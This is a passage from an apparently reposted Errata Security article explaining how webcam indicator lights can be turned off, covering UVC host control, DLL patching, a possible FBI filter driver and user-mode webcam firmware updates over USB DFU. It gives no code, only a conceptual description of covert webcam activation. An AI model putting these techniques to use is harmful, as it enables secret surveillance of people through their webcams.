Linux) without drivers from the manufacturer -- at least enough to get Skype working. Only the more advanced features particular to each vendor need vendor specific drivers. According to this standard, the LED indicator light is controlled by the host software. The UVC utilities that come with Linux allow you to control this light directly with a command-line tool, being able to turn off the light while the camera is on. To hack this on Windows appears to require a filter driver. We are too lazy to write one, which is why we just hacked the DLLs in the demonstration above. We believe this is what the FBI has done: a filter driver for the UVC standard would get most webcam products from different vendors, without the FBI haven't to write a custom hack for different vendors. USB has lots of interesting features. It's designed with the idea that a person without root/administrator access may still want to plug in a device and use it. Therefore, there is the idea of "user-mode" drivers, where a non-administrator can nonetheless install drivers to access the USB device. This can be exploited with the Device Firmware Update (DFU) standard. It means in many cases that in user-mode, without administrator privileges, the firmware of the webcam can be updated. The researchers in the paper above demonstrate this with a 2008 MacBook, but in principle, it should work on modern Windows 7 notebook computers as well, using most devices. The problem for a hacker is that they would have to build a hacked firmware for lots of different webcam chips. The upside is that they can do this all without getting root/administrator access to the machine. [h=3]Conclusion[/h] In the above video, Dave shows that the story of the FBI virus secretly enabling the webcam can work on at least one Windows machine. In our research we believe it can be done generically across most any webcam, using most any operating system. Sursa: Errata Security: How to disable webcam light on Windows
×
×
  • Create New...